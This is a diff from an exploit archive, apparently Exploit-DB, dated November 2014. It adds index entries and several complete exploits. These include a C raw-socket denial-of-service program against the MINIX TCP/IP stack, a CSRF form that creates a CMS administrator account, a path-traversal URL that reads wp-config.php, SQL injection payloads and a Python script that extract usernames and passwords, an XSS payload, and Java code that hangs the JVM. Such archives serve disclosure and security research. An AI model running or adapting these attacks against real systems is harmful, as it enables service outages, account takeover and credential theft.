Updated 11_21_2014

files.csv

@@ -31793,3 +31793,10 @@ id,file,description,date,author,platform,type,port
 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 'PHPCOVERAGE_HOME' Cross Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0
 35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 Cross Site Scripting and Local File Include Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0
 35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 'id' Parameter Cross Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0
+35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - CSRF Add Admin Exploit",2014-11-19,LiquidWorm,php,webapps,80
+35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 Remote TCP/IP Stack DoS",2014-11-19,nitr0us,linux,dos,31337
+35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 Path Traversal",2014-11-19,"Kacper Szurek",php,webapps,80
+35304,platforms/multiple/dos/35304.txt,"Oracle Java Floating-Point Value Denial of Service Vulnerability",2011-02-01,"Konstantin Preisser",multiple,dos,0
+35305,platforms/php/webapps/35305.txt,"ACollab 't' Parameter SQL Injection Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0
+35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 'user_password' Parameter Cross Site Scripting Vulnerability",2011-02-02,"AutoSec Tools",php,webapps,0
+35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 'cp_menu_data_file.php' SQL Injection Vulnerability",2011-01-31,"AutoSec Tools",php,webapps,0

platforms/linux/dos/35302.c

@@ -0,0 +1,182 @@
+/*
+  _-------------------------------------------------------_
+ ||------+  MINIX <= 3.3.0 Remote TCP/IP Stack DoS +------||
+ ||_______________________________________________________||
+ ||--=[ Alejandro Hernandez < nitr0us >               ]=--||
+ ||--=[ Nov 2014                                      ]=--||
+ ||--=[ Mexico                                        ]=--||
+  -_______________________________________________________-
+_____________________________________________________________________________________
+
+ MINIX IS PRONE TO DENIAL OF SERVICE IN THE TCP/IP STACK (/service/inet) BY SENDING 
+ A SINGLE TCP PACKET WITH A MALFORMED TCP OPTION. A TCP OPTION WITH LENGTH OF ZERO
+ WOULD CAUSE inet TO END UP IN AN INFINITE LOOP.
+
+ BECAUSE OF MINIX'S MICROKERNEL NATURE, THE NETWORKING SERVICE RUNS IN USERLAND AND 
+ THEREFORE, THE MOST CRITICAL PARTS OF THE RUNNING KERNEL ARE UNAFFECTED.
+
+ THIS ISSUE HAS BEEN REPORTED AND ALREADY FIXED:
+ https://github.com/Stichting-MINIX-Research-Foundation/minix/issues/7
+_____________________________________________________________________________________
+
+ MINIX 3
+ http://minix3.org
+
+ Microkernel (Slide 26)
+ http://www.eecs.harvard.edu/~mdw/course/cs161/notes/osstructure.pdf
+
+ TCP Option Kind Numbers
+ http://www.iana.org/assignments/tcp-parameters/tcp-parameters.xhtml#tcp-parameters-1
+_____________________________________________________________________________________
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <netdb.h>
+#include <arpa/inet.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netinet/ip.h>
+#define __FAVOR_BSD 1    /* Use BSD's tcp header style */
+#include <netinet/tcp.h>
+
+#define IPSIZE	sizeof(struct ip)
+#define TCPSIZE	sizeof(struct tcphdr)
+
+#define DEFAULT_SRC_IP	"1.3.3.7"
+
+uint16_t _checksum(uint16_t * addr, int len) {
+	int nleft = len;
+	int sum = 0;
+
+	uint16_t *w = addr;
+	uint16_t answer = 0;
+
+	while(nleft > 1){
+		sum += *w++;
+		nleft -= sizeof(uint16_t);
+	}
+
+	if(nleft == 1){
+		*(uint8_t *) (&answer) = *(uint8_t *) w;
+		sum += answer;
+	}
+
+	sum    =  (sum >> 16) + (sum & 0xffff);
+	sum    += (sum >> 16);
+	answer =  ~sum;
+
+	return (answer);
+}
+
+int main(int argc, char **argv)
+{
+	char *packet= (char *) malloc(IPSIZE + TCPSIZE + 4);
+	char *srcip = DEFAULT_SRC_IP;
+	int sockfd, count;
+	int pseudo_hdr_size = 12 + TCPSIZE + 4; // 12 bytes for the pseudo-header; 4 bytes for the payload
+	int one = 1; /* setsockopt() */
+	struct sockaddr_in target;
+	struct hostent *host2ip;
+	struct ip *IP = (struct ip *) packet;
+	struct tcphdr *TCP = (struct tcphdr *) (packet + IPSIZE);
+	unsigned char pseudo_hdr_for_checksum[pseudo_hdr_size];
+
+	if(argc < 2){
+		printf("  _-------------------------------------------------------_\n");
+		printf(" ||------+  MINIX <= 3.3.0 Remote TCP/IP Stack DoS +------||\n");
+		printf("  -_______________________________________________________-\n\n");
+		printf("Usage: %s <IP>\n", argv[0]);
+
+		exit(-1);
+	}
+
+	if((host2ip = gethostbyname(argv[1])) == NULL){
+		perror("gethostbyname");
+		exit(-1);
+	}
+
+	if(getuid() != 0){
+		fprintf(stderr, "You must be root to create raw sockets.\n");
+		exit(-1);
+	}
+
+	memset(packet, 0x00, sizeof(packet));
+	memset(&target, 0x00, sizeof(target));
+
+	target.sin_family	= AF_INET;
+	target.sin_port		= htons(31337);
+	target.sin_addr		= *((struct in_addr *)host2ip->h_addr);
+
+	/*** SEMI-VALID TCP/IP PACKET ***/
+	IP->ip_src.s_addr = inet_addr(srcip);
+	IP->ip_dst.s_addr = target.sin_addr.s_addr;
+	IP->ip_hl	= 0x05;
+	IP->ip_v	= 0x04;
+	IP->ip_tos	= 0x00;
+	IP->ip_len	= htons(IPSIZE + TCPSIZE + 4);
+	IP->ip_id	= 0x01;
+	IP->ip_ttl	= 0xff;
+	IP->ip_p	= IPPROTO_TCP;
+	IP->ip_sum	= _checksum((uint16_t *) IP, IPSIZE);
+
+	TCP->th_sport	= htons(0xcafe);
+	TCP->th_dport	= htons(31337);
+	TCP->th_seq	= htonl(rand());
+	TCP->th_ack	= htonl(rand());
+	TCP->th_off	= ((TCPSIZE + 4) / 4);
+	TCP->th_win	= htons(0x1337);
+	TCP->th_flags	= rand() & 0x0f;
+	TCP->th_sum	= 0x00;
+
+	/* Malformed TCP Options
+	Initially tested with "\x03\x00\x00\x00" but realized that MINIX 3 hangs even with 2, 3, 4, 5, 
+	6, 7, 8, 0x7f, 0xff, in the first byte. Then, I found out that if the option size (the 2nd byte) 
+	is higher than zero, the stack doesn't hang. For this PoC, "\xff\x00\x00\x00" is used: */
+	memcpy(packet + IPSIZE + TCPSIZE, "\xff\x00\x00\x00", 4);
+
+	// TCP Checksum Calculation and the TCP "Pseudo Header" 
+	// http://www.tcpipguide.com/free/t_TCPChecksumCalculationandtheTCPPseudoHeader-2.htm
+	memset(pseudo_hdr_for_checksum, 0x00, pseudo_hdr_size);
+	*((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum +  0)) = IP->ip_src.s_addr;
+	*((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum +  4)) = IP->ip_dst.s_addr;
+	*((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum +  8)) = 0x00;
+	*((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum +  9)) = IPPROTO_TCP;
+	*((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum + 10)) = htons(TCPSIZE + 4);
+	memcpy(pseudo_hdr_for_checksum + 12, ((unsigned char *) packet) + IPSIZE, TCPSIZE + 4);
+
+	TCP->th_sum	= _checksum((uint16_t *) &pseudo_hdr_for_checksum, pseudo_hdr_size);
+
+	printf("-=[ Computed IP header checksum:  IP->ip_sum  = 0x%x\n", IP->ip_sum);
+	printf("-=[ Computed TCP header checksum: TCP->th_sum = 0x%x\n\n", TCP->th_sum);
+	printf("-=[ Sending malformed TCP/IP packet...\n\n");
+
+	if((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1){
+		perror("socket");
+		exit(-1);
+	}
+
+	if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) == -1){
+		perror("setsockopt");
+		exit(-1);
+	}
+
+	if((count = sendto(sockfd, packet, IPSIZE + TCPSIZE + 4, 0, (struct sockaddr *) &target, sizeof(target))) == -1){
+		perror("sendto");
+		close(sockfd);
+		exit(-1);
+	}
+
+	close(sockfd);
+
+	printf("-=[ Sent %d bytes to %s:31337\n", count, argv[1]);
+	printf("-=[ TCP/IP stack should be hanged now\n");
+	printf("-=[ Try to ping %s... \n", argv[1]);
+
+	return 0;
+}

platforms/multiple/dos/35304.txt

@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/46091/info
+
+Oracle Java is prone to a remote denial-of-service vulnerability.
+
+Successful attacks will cause applications written in Java to hang, creating a denial-of-service condition.
+
+This issue affects both the Java compiler and Runtime Environment. 
+
+Send a Java Program Into An Infinite Loop
+
+Compile this program and run it; the program will hang (at least it does on a 32-bit system with the latest JRE/JDK):
+
+class runhang {
+public static void main(String[] args) {
+  System.out.println("Test:");
+  double d = Double.parseDouble("2.2250738585072012e-308");
+  System.out.println("Value: " + d);
+ }
+}
+
+Send the Java Compiler Into An Infinite Loop
+
+Try to compile this program; the compiler will hang:
+
+class compilehang {
+public static void main(String[] args) {
+  double d = 2.2250738585072012e-308;
+  System.out.println("Value: " + d);
+ }
+}

platforms/php/webapps/35301.html

@@ -0,0 +1,56 @@
+?<!--
+
+Snowfox CMS v1.0 CSRF Add Admin Exploit
+
+
+Vendor: Globiz Solutions
+Product web page: http://www.snowfoxcms.org
+Affected version: 1.0
+
+Summary: Snowfox is an open source Content Management System (CMS)
+that allows your website users to create and share content based
+on permission configurations.
+
+Desc: Snowfox CMS suffers from a cross-site request forgery
+vulnerabilities. The application allows users to perform certain
+actions via HTTP requests without performing any validity checks
+to verify the requests. This can be exploited to perform certain
+actions with administrative privileges if a logged-in user visits
+a malicious web site.
+
+Tested on: Apache/2.4.7 (Win32)
+           PHP/5.5.6
+           MySQL 5.6.14
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2014-5205
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5205.php
+
+
+
+12.11.2014
+
+-->
+
+
+<html>
+  <body>
+    <form action="http://10.0.18.3/snowfox/?uri=admin/accounts/create" method="POST">
+      <input type="hidden" name="emailAddress" value="lab@zeroscience.mk" />
+      <input type="hidden" name="verifiedEmail" value="verified" />
+      <input type="hidden" name="username" value="USERNAME" />
+      <input type="hidden" name="newPassword" value="PASSWORD" />
+      <input type="hidden" name="confirmPassword" value="PASSWORD" />
+      <input type="hidden" name="userGroups[]" value="34" />
+      <input type="hidden" name="userGroups[]" value="33" />
+      <input type="hidden" name="memo" value="CSRFmemo" />
+      <input type="hidden" name="status" value="1" />
+      <input type="hidden" name="formAction" value="submit" />
+      <input type="submit" value="Submit form" />
+    </form>
+  </body>
+</html>

platforms/php/webapps/35303.txt

@@ -0,0 +1,24 @@
+# Exploit Title: Paid Memberships Pro 1.7.14.2 Path Traversal
+# Date: 14-10-2014
+# Exploit Author: Kacper Szurek - http://security.szurek.pl
+# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.1.7.14.2.zip
+# Category: webapps
+# CVE: CVE-2014-8801
+ 
+1. Description
+ 
+getfile.php is accessible to everyone.
+is_admin() is used to check priveleges but because this code is run in context of wp-admin/admin-ajax.php this function always evalute to true.
+$_SERVER['REQUEST_URI'] is not escaped.
+ 
+http://security.szurek.pl/paid-memberships-pro-17142-path-traversal.html
+ 
+2. Proof of Concept
+ 
+http://wordpress-url/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php
+ 
+3. Solution:
+ 
+Update to version 1.7.15
+http://downloads.wordpress.org/plugin/paid-memberships-pro.1.7.15.zip
+http://www.paidmembershipspro.com/2014/11/critical-security-update-pmpro-v1-7-15/

platforms/php/webapps/35305.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46095/info
+
+ACollab is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+ACollab 1.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/acollab/admin/lang.php?lang=&t=xxx'UNION%20SELECT%200,0,'error',GROUP_CONCAT(login,':',password),4%20FROM%20AC_members%20WHERE%20'a'='a 

platforms/php/webapps/35306.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46096/info
+
+TCExam is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+TCExam 11.1.016 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/tcexam/public/code/tce_user_registration.php?user_password=testab%22%3E%3Cscript%3Ealert(0)%3C/script%3E%3Cinput%20type=%22hidden 

platforms/php/webapps/35307.py

@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/46097/info
+
+All In One Control Panel (AIOCP) is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+AIOCP 1.4.001 is vulnerable; other versions may also be affected. 
+
+import re, socket
+
+host = 'localhost'
+port = 80
+
+r = re.compile('\'([^\']+):([^\s]+)\sLIMIT')
+
+# Search user ids 0 through 16
+for i in range(0,16):
+
+
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    s.settimeout(8)
+    s.send("GET /AIOCP/public/code/cp_menu_data_file.php?menu='or%201=1%20UNION%20ALL%20SELECT%201,0,CONCAT(',',user_name,':',user_password)%20as%20menulst_name,0%20FROM%20aiocp_users%20ORDER%20BY%20menulst_style%20LIMIT%20" + str(i) + ",1;%23 HTTP/1.1\r\n"
+           'Host: ' + host + '\r\n'
+           '\r\n')
+
+    resp = s.recv(8192)
+
+    m = r.search(resp)
+
+    if m is None: continue
+
+    print 'Username: ' + m.group(1) + '\nPassword: ' + m.group(2) + '\n'
+